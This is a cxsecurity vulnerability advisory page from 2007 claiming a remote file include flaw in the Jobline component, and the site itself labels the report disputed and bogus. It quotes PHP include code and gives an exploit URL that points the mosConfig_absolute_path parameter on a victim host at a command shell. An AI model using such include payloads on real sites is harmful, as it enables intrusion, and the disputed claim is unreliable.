WARNING! Fake news / Disputed / BOGUS

Jobline 1 1 1 Version - Remote File Include Vulnerability

2007.02.17
Credit: SpC-x
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# SaVSaK.CoM | SpC-x - The_BeKiR | # Jobline 1 1 1 Version - Remote File Include Vulnerability # Risk : High # Class: Remote # Script : Jobline # Credits : SpC-x # Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx # Code : # if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.ph p" ) ) { # include_once("$mosConfig_absolute_path/components/$option/language/$mosC onfig_lang.php"); # } else { # include_once("$mosConfig_absolute_path/components/$option/language/engli sh.php"); # } # Vulnerable : # http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path= Command-Shell


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top